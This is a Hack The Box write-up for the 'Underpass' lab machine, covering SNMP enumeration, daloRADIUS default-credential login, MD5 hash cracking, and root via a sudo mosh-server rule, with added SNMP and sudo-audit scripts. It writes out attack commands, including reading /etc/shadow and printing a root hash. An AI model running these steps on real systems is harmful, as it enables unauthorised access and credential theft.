HTB – Underpass

by | May 10, 2025


    https://www.hackthebox.com/machines/UnderPass


    Reconnaissance

    nmap/TCP

    nmap finds two open TCP ports, SSH (22) and HTTP (80):

    croc@hacker$ rustscan -a underpass.htb --ulimit 5000 -- -A -T5 -oA initial
    
    Nmap scan report for underpass.htb (10.10.11.48)
    Host is up, received conn-refused (0.30s latency).
    Scanned at 2024-12-25 01:14:10 EST for 19s
    
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
    |   256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
    80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
    |_http-title: Apache2 Ubuntu Default Page: It works
    |_http-server-header: Apache/2.4.52 (Ubuntu)
    | http-methods: 
    |_  Supported Methods: HEAD GET POST OPTIONS
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Based on the OpenSSH and Apache versions, the host is likely running Ubuntu jammy (22.04 LTS).

    Without valid credentials, SSH is not a viable entry point. Therefore, the primary attack surface is HTTP, where an Apache2 web server is running with a default page.

    nmap/UDP

    I usually also kick off a UDP Scan alongside the TCP Scan. Since UDP scans can be slow, I limited the scan to the top 50 ports to reduce the time taken.

    nmap finds SNMP open on UDP port 161, which can be quite juicy!

    croc@hacker$ sudo nmap -sU --top-ports 50 -T3 -oN UDPScan underpass.htb
    
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 01:17 EST
    Nmap scan report for underpass.htb (10.10.11.48)
    Host is up (0.27s latency).
    
    PORT    STATE SERVICE
    161/udp open  snmp
    
    Nmap done: 1 IP address (1 host up) scanned in 51.12 seconds

    Website – 80/TCP

    Main Page

    We have the Apache default web page, as we already saw in our scan:

    Directory Busting

    Directory enumeration did not reveal anything notable. Most of the discovered paths return 403, and a 200 for index.html is nothing unusual for an Apache web server.

    croc@hacker$ gobuster dir -u http://underpass.htb -w /usr/share/wordlists/dirb/common.txt
    
    ===============================================================
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://underpass.htb
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/wordlists/dirb/common.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.6
    [+] Timeout:                 10s
    ===============================================================
    Starting gobuster in directory enumeration mode
    ===============================================================
    /.hta                 (Status: 403) [Size: 278]
    /.htaccess            (Status: 403) [Size: 278]
    /.htpasswd            (Status: 403) [Size: 278]
    /index.html           (Status: 200) [Size: 10671]
    /server-status        (Status: 403) [Size: 278]
    Progress: 4614 / 4615 (99.98%)
    ===============================================================
    Finished
    ===============================================================

    SNMP – 161/UDP

    With such a limited attack surface, it’s worthwhile to explore UDP.

    Finding the Community String

    In order to interact with SNMP, a community string is required; it functions as a password that authenticates us. It's really common to see a community string of public for data that is meant to be public, so guessing that is a good first bet. There's also a tool called onesixtyone, built into Kali, which tries a list of common community strings against a host. Let's try running it:

    croc@hacker$ onesixtyone 10.10.11.48 -c /usr/share/doc/onesixtyone/dict.txt
    Scanning 1 hosts, 50 communities
    10.10.11.48 [public] Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64

    Using the list of common community strings shipped with the tool, we found that our target host is indeed using public as the community string.

    Another approach is to use the Nmap Scripting Engine (NSE) with the snmp-brute script to enumerate the community string.

    croc@hacker:~$ sudo nmap -sU -p 161 --script=snmp-brute --min-rate 500 underpass.htb
    Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 07:47 EST
    Nmap scan report for underpass.htb (10.10.11.48)
    Host is up (0.28s latency).
    
    PORT    STATE SERVICE
    161/udp open  snmp
    | snmp-brute: 
    |_  public - Valid credentials
    
    Nmap done: 1 IP address (1 host up) scanned in 12.86 seconds

    snmpbulkwalk/snmpwalk

    We can utilize snmpwalk or snmpbulkwalk in order to enumerate SNMP. But before doing that, there’s one more thing to look into.

    SNMP uses a hierarchical numbering scheme (OIDs) to label the data it holds. There's an add-on package that translates these numbers into readable MIB names. We can set it up with apt install snmp-mibs-downloader and then commenting out the following line in the /etc/snmp/snmp.conf file:

    Now, I used snmpbulkwalk to enumerate SNMP using the community string public. This revealed a username, steve@underpass.htb, and the use of a daloRADIUS server.

    croc@hacker$ snmpbulkwalk -c public -v2c underpass.htb
    
    SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
    SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
    DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (285355) 0:47:33.55
    SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
    SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
    SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
    SNMPv2-MIB::sysServices.0 = INTEGER: 72
    SNMPv2-MIB::sysORLastChange.0 = Timeticks: (5) 0:00:00.05
    SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
    SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
    SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
    SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
    SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
    SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
    SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
    SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
    SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
    SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
    SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
    SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
    SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
    SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
    SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
    SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
    SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
    SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
    SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
    SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.
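    The walk above is worth reading as structured data rather than by eye: the system group (sysDescr, sysContact, sysName, sysLocation) is where operators leak contact addresses, hostnames and product names, and the same fields print as bare numeric OIDs when the MIB package is not installed. The following parser is an added example, not part of the original post; it handles both output shapes (MIB-resolved names and iso.-prefixed numeric OIDs) and pulls out the e-mail addresses and hostnames hidden in free-text values. The MIB-resolved sample is copied from the walk above; the numeric-OID sample is constructed to match it.

```python
import re
from typing import Any, Dict, Optional, Tuple

# Sample walk as snmpbulkwalk prints it once the MIB names resolve
# (these lines are taken from the output above).
SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (285355) 0:47:33.55
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
SNMPv2-MIB::sysServices.0 = INTEGER: 72
"""

# Constructed: the same data as net-snmp prints it WITHOUT the MIB package
# installed (numeric OIDs under iso., quoted strings).
SAMPLE_WALK_NO_MIBS = """\
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.3.0 = Timeticks: (285355) 0:47:33.55
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
"""

# The SNMPv2-MIB system group lives under 1.3.6.1.2.1.1.<n>.0
SYSTEM_GROUP = {"1": "sysDescr", "2": "sysObjectID", "3": "sysUpTime",
                "4": "sysContact", "5": "sysName", "6": "sysLocation",
                "7": "sysServices"}

LINE_RE = re.compile(r"^(?P<oid>\S+)\s*=\s*(?:(?P<type>[A-Za-z0-9-]+):\s*)?(?P<value>.*)$")
TICKS_RE = re.compile(r"^\((\d+)\)")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
HOST_RE = re.compile(r"\b([a-z][a-z0-9-]*(?:\.[a-z0-9-]+)*\.[a-z]{2,})\b", re.I)


def canonical_oid(oid: str) -> str:
    """Give numeric system-group OIDs the same key a MIB-resolved walk would use."""
    if oid.startswith("iso."):
        oid = "1." + oid[4:]
    m = re.fullmatch(r"1\.3\.6\.1\.2\.1\.1\.(\d+)\.0", oid)
    if m and m.group(1) in SYSTEM_GROUP:
        name = SYSTEM_GROUP[m.group(1)]
        if name == "sysUpTime":
            return "DISMAN-EVENT-MIB::sysUpTimeInstance"
        return f"SNMPv2-MIB::{name}.0"
    return oid


def parse_value(typ: Optional[str], raw: str) -> Any:
    """Turn the textual value into something usable."""
    if typ == "INTEGER":
        return int(raw.split("(")[-1].rstrip(")"))  # "72" or "up(1)"
    if typ == "Timeticks":
        m = TICKS_RE.match(raw)
        return int(m.group(1)) if m else raw  # hundredths of a second
    if typ == "STRING":
        return raw[1:-1] if len(raw) >= 2 and raw[0] == raw[-1] == '"' else raw
    return raw


def parse_walk(text: str) -> Dict[str, Tuple[Optional[str], Any]]:
    """Map each (canonicalised) OID to a (type, value) pair. Continuation lines
    of multi-line values are not joined; 'No Such Object' answers are dropped."""
    entries = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        typ, raw = m.group("type"), m.group("value")
        if typ is None and raw.startswith("No Such"):
            continue
        entries[canonical_oid(m.group("oid"))] = (typ, parse_value(typ, raw))
    return entries


def summarise(entries: Dict[str, Tuple[Optional[str], Any]]) -> Dict[str, Any]:
    """Collect the system-group fields plus any e-mail addresses and hostnames
    found in free-text values (the contact address and hostname leaked above)."""
    system, emails, hosts = {}, set(), set()
    for name, (typ, val) in entries.items():
        short = name.split("::")[-1].split(".")[0]
        if short == "sysUpTimeInstance":
            short = "sysUpTime"
        if short in SYSTEM_GROUP.values():
            system[short] = val
        if typ == "STRING":
            emails.update(EMAIL_RE.findall(val))
            hosts.update(h.lower() for h in HOST_RE.findall(val))
    return {"system": system, "emails": sorted(emails), "hosts": sorted(hosts)}


if __name__ == "__main__":
    for sample in (SAMPLE_WALK, SAMPLE_WALK_NO_MIBS):
        print(summarise(parse_walk(sample)))
```

    Both samples summarise to the same contact address and hostname, which is the point: installing the MIBs changes only the labels, not what the agent gives away. On the defensive side, the same script run against your own agents is a quick check that sysContact and sysName do not carry anything you would not put on a public web page.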

    snmp-check

    We can use snmp-check for the same purpose as well; it gives more structured output:

    croc@hacker$ snmp-check -c public -v 2c 10.10.11.48
    
    snmp-check v1.9 - SNMP enumerator
    Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
    
    [+] Try to connect to 10.10.11.48:161 using SNMPv2c and community 'public'
    
    [*] System information:
    
      Host IP address               : 10.10.11.48
      Hostname                      : UnDerPass.htb is the only daloradius server in the basin!
      Description                   : Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
      Contact                       : steve@underpass.htb
      Location                      : Nevada, U.S.A. but not Vegas
      Uptime snmp                   : 02:09:58.97
      Uptime system                 : 02:09:45.95
      System date                   : 2025-1-2 02:36:45.0
    
    [*] Network information:
    
      Default TTL                   : noSuchObject
      TCP segments received         : noSuchObject
      TCP segments sent             : noSuchObject
      TCP segments retrans          : noSuchObject
      Input datagrams               : noSuchObject
      Delivered datagrams           : noSuchObject
      Output datagrams              : noSuchObject
    
    [*] File system information:
    
      Index                         : noSuchObject
      Mount point                   : noSuchObject
      Access                        : noSuchObject
      Bootable                      : noSuchObject

    Now, what??

    daloRADIUS is a web-based management interface for a RADIUS (Remote Authentication Dial-In User Service) server; specifically, it manages FreeRADIUS, a widely used open-source RADIUS server, and its database structure.

    💡 Think Box

    A Hunch, but Well-Thought

    /daloradius

    I got a 403 Forbidden, which tells me that this is most probably the root directory of the daloRADIUS web application.

    Directory Brute Force

    Let’s bust subdirectories for /daloradius and hope for the best:

    croc@hacker$ sudo feroxbuster -u http://underpass.htb/daloradius -w /usr/share/seclists/Discovery/Web-Content/big.txt 
                                                                                                                   
     ___  ___  __   __     __      __         __   ___
    |__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
    |    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
    by Ben "epi" Risher 🤓                 ver: 2.10.4
    ───────────────────────────┬──────────────────────
     🎯  Target Url            │ http://underpass.htb/daloradius
     🚀  Threads               │ 50
     📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/big.txt
     👌  Status Codes          │ All Status Codes!
     💥  Timeout (secs)        │ 7
     🦡  User-Agent            │ feroxbuster/2.10.4
     💉  Config File           │ /etc/feroxbuster/ferox-config.toml
     🔎  Extract Links         │ true
     🏁  HTTP methods          │ [GET]
     🔃  Recursion Depth       │ 4
     🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
    ───────────────────────────┴──────────────────────
     🏁  Press [ENTER] to use the Scan Management Menu™
    ──────────────────────────────────────────────────
    403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
    404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
    301      GET        9l       28w      319c http://underpass.htb/daloradius => http://underpass.htb/daloradius/
    200      GET      412l     3898w    24703c http://underpass.htb/daloradius/ChangeLog
    200      GET      340l     2968w    18011c http://underpass.htb/daloradius/LICENSE
    301      GET        9l       28w      323c http://underpass.htb/daloradius/app => http://underpass.htb/daloradius/app/
    301      GET        9l       28w      327c http://underpass.htb/daloradius/contrib => http://underpass.htb/daloradius/contrib/
    301      GET        9l       28w      323c http://underpass.htb/daloradius/doc => http://underpass.htb/daloradius/doc/
    301      GET        9l       28w      330c http://underpass.htb/daloradius/app/common => http://underpass.htb/daloradius/app/common/
    301      GET        9l       28w      330c http://underpass.htb/daloradius/contrib/db => http://underpass.htb/daloradius/contrib/db/
    301      GET        9l       28w      327c http://underpass.htb/daloradius/library => http://underpass.htb/daloradius/library/
    301      GET        9l       28w      325c http://underpass.htb/daloradius/setup => http://underpass.htb/daloradius/setup/
    301      GET        9l       28w      331c http://underpass.htb/daloradius/doc/install => http://underpass.htb/daloradius/doc/install/
    301      GET        9l       28w      333c http://underpass.htb/daloradius/app/operators => http://underpass.htb/daloradius/app/operators/
    301      GET        9l       28w      339c http://underpass.htb/daloradius/app/common/includes => http://underpass.htb/daloradius/app/common/includes/
    301      GET        9l       28w      338c http://underpass.htb/daloradius/app/common/library => http://underpass.htb/daloradius/app/common/library/
    301      GET        9l       28w      335c http://underpass.htb/daloradius/contrib/scripts => http://underpass.htb/daloradius/contrib/scripts/
    301      GET        9l       28w      340c http://underpass.htb/daloradius/app/common/templates => http://underpass.htb/daloradius/app/common/templates/
    301      GET        9l       28w      341c http://underpass.htb/daloradius/app/operators/include => http://underpass.htb/daloradius/app/operators/include/
    301      GET        9l       28w      338c http://underpass.htb/daloradius/app/operators/lang => http://underpass.htb/daloradius/app/operators/lang/
    301      GET        9l       28w      341c http://underpass.htb/daloradius/app/operators/library => http://underpass.htb/daloradius/app/operators/library/
    301      GET        9l       28w      347c http://underpass.htb/daloradius/app/operators/notifications => http://underpass.htb/daloradius/app/operators/notifications/
    301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/include/common => http://underpass.htb/daloradius/app/operators/include/common/
    301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/include/config => http://underpass.htb/daloradius/app/operators/include/config/
    301      GET        9l       28w      347c http://underpass.htb/daloradius/contrib/scripts/maintenance => http://underpass.htb/daloradius/contrib/scripts/maintenance/
    301      GET        9l       28w      340c http://underpass.htb/daloradius/app/operators/static => http://underpass.htb/daloradius/app/operators/static/
    301      GET        9l       28w      352c http://underpass.htb/daloradius/app/operators/library/extensions => http://underpass.htb/daloradius/app/operators/library/extensions/
    301      GET        9l       28w      352c http://underpass.htb/daloradius/app/operators/include/management => http://underpass.htb/daloradius/app/operators/include/management/
    301      GET        9l       28w      346c http://underpass.htb/daloradius/app/operators/include/menu => http://underpass.htb/daloradius/app/operators/include/menu/
    301      GET        9l       28w      344c http://underpass.htb/daloradius/app/operators/static/css => http://underpass.htb/daloradius/app/operators/static/css/
    301      GET        9l       28w      355c http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor => http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor/
    301      GET        9l       28w      347c http://underpass.htb/daloradius/app/operators/static/images => http://underpass.htb/daloradius/app/operators/static/images/
    301      GET        9l       28w      348c http://underpass.htb/daloradius/app/operators/library/tables => http://underpass.htb/daloradius/app/operators/library/tables/
    301      GET        9l       28w      357c http://underpass.htb/daloradius/app/operators/notifications/templates => http://underpass.htb/daloradius/app/operators/notifications/templates/
    [####################] - 24m   409646/409646  0s      found:32      errors:66265  
    [####################] - 8m     20477/20477   41/s    http://underpass.htb/daloradius/ 
    [####################] - 10m    20477/20477   35/s    http://underpass.htb/daloradius/app/ 
    [####################] - 9m     20477/20477   37/s    http://underpass.htb/daloradius/contrib/ 
    [####################] - 10m    20477/20477   36/s    http://underpass.htb/daloradius/doc/ 
    [####################] - 10m    20477/20477   33/s    http://underpass.htb/daloradius/app/common/ 
    [####################] - 10m    20477/20477   33/s    http://underpass.htb/daloradius/contrib/db/ 
    [####################] - 11m    20477/20477   31/s    http://underpass.htb/daloradius/library/ 
    [####################] - 11m    20477/20477   31/s    http://underpass.htb/daloradius/setup/ 
    [####################] - 13m    20477/20477   26/s    http://underpass.htb/daloradius/app/operators/ 
    [####################] - 12m    20477/20477   28/s    http://underpass.htb/daloradius/doc/install/ 
    [####################] - 13m    20477/20477   26/s    http://underpass.htb/daloradius/app/common/includes/ 
    [####################] - 12m    20477/20477   28/s    http://underpass.htb/daloradius/app/common/library/ 
    [####################] - 13m    20477/20477   27/s    http://underpass.htb/daloradius/contrib/scripts/ 
    [####################] - 11m    20477/20477   30/s    http://underpass.htb/daloradius/app/common/templates/ 
    [####################] - 11m    20477/20477   30/s    http://underpass.htb/daloradius/app/operators/include/ 
    [####################] - 11m    20477/20477   32/s    http://underpass.htb/daloradius/app/operators/lang/ 
    [####################] - 11m    20477/20477   32/s    http://underpass.htb/daloradius/app/operators/library/ 

    /app/operators

    Navigating to /daloradius/app/operators, I was redirected to the daloradius login page.

    Something that I want you to note here is the difference between the version of the application shown on the login page and the one in the ChangeLog entry below:

    Identifying the correct version is crucial when looking for exploits and CVEs. The version on the login page is, in my opinion, certainly the most accurate. However, it's not required for solving this box.

    Default Credentials

    Whenever I see a login page, my first go-to is default credentials, as they're just too common. I found the following default credentials in the GitHub repo:

    I tried the default credentials and they worked flawlessly:

    We have one user in the users list: a user named svcMosh with what looks like an MD5-hashed password.

    Shell as svcMosh

    Hash Cracking

    First of all, we must confirm the hash type using hash-identifier:

    As it is possibly an MD5 hash, let's try to crack it:

    croc@hacker$ hashcat -m 0 svcmosh_hash.txt /usr/share/wordlists/rockyou.txt

    Hurrah!! We successfully cracked the password! Have some dance lol!

    SSH

    With SSH open and a pair of credentials, we can try to gain initial access:

    croc@hacker$ ssh svcMosh@10.10.11.48
    svcMosh@10.10.11.48's password: 
    Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/pro
    
     System information as of Wed Jan  1 04:31:04 PM UTC 2025
    
      System load:  0.05              Processes:             230
      Usage of /:   96.5% of 3.75GB   Users logged in:       1
      Memory usage: 17%               IPv4 address for eth0: 10.10.11.48
      Swap usage:   0%
    
      => / is using 96.5% of 3.75GB
    
    
    Expanded Security Maintenance for Applications is not enabled.
    
    0 updates can be applied immediately.
    
    Enable ESM Apps to receive additional future security updates.
    See https://ubuntu.com/esm or run: sudo pro status
    
    
    The list of available updates is more than a week old.
    To check for new updates run: sudo apt update
    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
    
    
    Last login: Wed Jan  1 16:21:17 2025 from 10.10.16.17
    svcMosh@underpass:~$ 

    Now, grab user.txt:

    svcMosh@underpass:~$ ls
    user.txt
    
    svcMosh@underpass:~$ cat user.txt 
    31955***************************

    Shell as Root

    Enumeration

    The first things I look into after gaining a foothold on a Linux box are quick wins: shell history (where there may be a password), sudo permissions, and SUID/SGID binaries.

    Sudo Privileges

    I found that the user svcMosh has passwordless sudo privileges to execute /usr/bin/mosh-server as any user, including root.

    svcMosh@underpass:~$ sudo -l
    Matching Defaults entries for svcMosh on localhost:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
    
    User svcMosh may run the following commands on localhost:
        (ALL) NOPASSWD: /usr/bin/mosh-server
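    A rule like the one above is easy to miss in a fleet-wide review, because the eye-catching part (NOPASSWD) is not actually what matters: mosh-server executes the caller's login shell, so delegating it as ALL is a root shell whether or not a password is asked for. The following audit script is an added example, not part of the original post; it parses the "may run the following commands" section of sudo -l output and rates each rule. The sample input is the output above plus one constructed, harmless rule; the SHELL_SPAWNERS seed list (mosh-server plus the plain shells) is an assumption to be extended for your own environment.

```python
import os
import re
from typing import Dict, List

# Constructed sample: the `sudo -l` output shown above plus one extra,
# made-up rule so that a harmless delegation gets classified too.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server
    (www-data) /usr/bin/systemctl status apache2
"""

# One rule line: "(runas_user[, ...][ : runas_group]) [TAG: ...] command[, command]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

# Binaries that hand the caller an interactive shell when run. mosh-server is
# listed because, as described in this write-up, it executes the user's login
# shell once a client attaches; bash/sh are the obvious cases. Assumption:
# this seed list is not exhaustive and should be extended per environment.
SHELL_SPAWNERS = {"mosh-server", "bash", "sh"}


def parse_sudo_l(text: str) -> List[Dict]:
    """Parse the 'may run the following commands' section of `sudo -l`."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # wrapped continuation lines are ignored here
        users = [u.strip() for u in m.group("runas").split(":")[0].split(",")]
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        for cmd in m.group("cmds").split(", "):
            rules.append({"runas": users, "tags": tags, "command": cmd.strip()})
    return rules


def assess(rule: Dict) -> Dict:
    """Rate one rule. The decisive question is not NOPASSWD but whether the
    delegated binary hands the caller a shell as a privileged user."""
    root_capable = any(u in ("ALL", "root") for u in rule["runas"])
    nopasswd = "NOPASSWD" in rule["tags"]
    binary = os.path.basename(rule["command"].split()[0])
    spawns_shell = rule["command"] == "ALL" or binary in SHELL_SPAWNERS
    if root_capable and spawns_shell:
        severity, reason = "critical", f"{binary} gives the caller a shell as root"
    elif root_capable:
        severity, reason = "high", f"{binary} runs as root; review what it can read, write or execute"
    elif nopasswd:
        severity, reason = "medium", "passwordless, but limited to an unprivileged runas user"
    else:
        severity, reason = "low", "requires the caller's password and runs unprivileged"
    return {**rule, "nopasswd": nopasswd, "severity": severity, "reason": reason}


def audit(text: str) -> List[Dict]:
    """Parse and rate every rule in a `sudo -l` dump."""
    return [assess(r) for r in parse_sudo_l(text)]


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print(f"[{f['severity']:8}] ({', '.join(f['runas'])}) {f['command']}: {f['reason']}")
```

    Run against the output above, the mosh-server rule comes out as critical and the constructed systemctl rule as low. The fix on the defensive side is the same either way: never delegate a binary that spawns a shell, and keep the runas user as narrow as the task allows.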

    Mosh

    Let’s start by understanding mosh.

    In simple words, mosh is a modern replacement for SSH. Since SSH relies on TCP, which maintains a session bound to a specific IP address, it struggles when switching networks or when the connection is interrupted. Mosh addresses this limitation by using UDP and application-level sessions, keeping the session alive even across network changes.

    Normally, if we have the target user's password and mosh is installed on the target, we can just connect and it does everything for us. We can see this in action as well.

    Install mosh on your Kali machine with apt install mosh. Then we can simply connect as the svcMosh user, because we have that user's password.

    croc@hacker:~$ mosh svcMosh@10.10.11.48
    The authenticity of host '10.10.11.48 (<no hostip for proxy command>)' can't be established.
    ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
    This key is not known by any other names.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.
    svcMosh@10.10.11.48's password: 
    

    What it does is establish a session over SSH and run mosh-server on the target. After the server starts, SSH disconnects and the client switches to UDP for communication.

    So, we got a shell as the svcMosh user. But in order to do this for the root user, we would need root's password, which we don't currently have. So, we'll take a different route: the manual way of doing it.

    Run the Mosh Server

    Manually run mosh-server on the target box. It binds a high UDP port on the target itself (60001 here). As soon as a client connects to that port, it executes the user's login shell. Since we have sudo permissions over mosh-server, we can expect to get a shell as root.

    svcMosh@underpass:~$ sudo mosh-server
    
    
    MOSH CONNECT 60001 6odTyvz2KOIVZuV8fym5uw
    
    mosh-server (mosh 1.3.2) [build mosh 1.3.2]
    Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    
    [mosh-server detached, pid = 1359]

    If you want to, you can also choose a port yourself by passing -p to the new command:

    svcMosh@underpass:~$ sudo mosh-server new -p 9005
    
    
    MOSH CONNECT 9005 +4f+MTlmKWXtgliNPRoexA
    
    mosh-server (mosh 1.3.2) [build mosh 1.3.2]
    Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    
    [mosh-server detached, pid = 1498]

    Connect through Mosh Client

    6odTyvz2KOIVZuV8fym5uw is the base64-encoded session key and 60001 is the port. The client reads the key from the MOSH_KEY environment variable:

    svcMosh@underpass:~$ MOSH_KEY=6odTyvz2KOIVZuV8fym5uw mosh-client 127.0.0.1 60001

    And, we got root! Congratulations(to me of course 😂)!

    Time-sensitive Connection Requirement

    Now, make sure that you connect to the mosh-server within 60 seconds of starting it. Otherwise, the server shuts down automatically and you will see the following error when connecting with mosh-client:

    root.txt

    root@underpass:~# ls
    root.txt
    
    root@underpass:~# cat root.txt 
    8fff7***************************

    Post Root

    We got the root flag, but the shell is really unstable; I am not even able to scroll up. Let's look for other ways!

    Failed Attempt

    Cracking the Root Hash

    We have read access to /etc/shadow, so I thought I'd try cracking the root hash (although that proved to be a dumb idea!).

    root@underpass:~# head -n 4 /etc/shadow
    root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7:::
    daemon:*:19103:0:99999:7:::
    bin:*:19103:0:99999:7:::
    sys:*:19103:0:99999:7:::

    The $y$ prefix specifies the yescrypt algorithm, a modern password hashing scheme designed to provide enhanced security and performance. Hashcat doesn't support yescrypt, so I used john to crack this hash.

    However, this was going extremely slowly, so I aborted the session.

    croc@hacker$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
    Using default input encoding: UTF-8
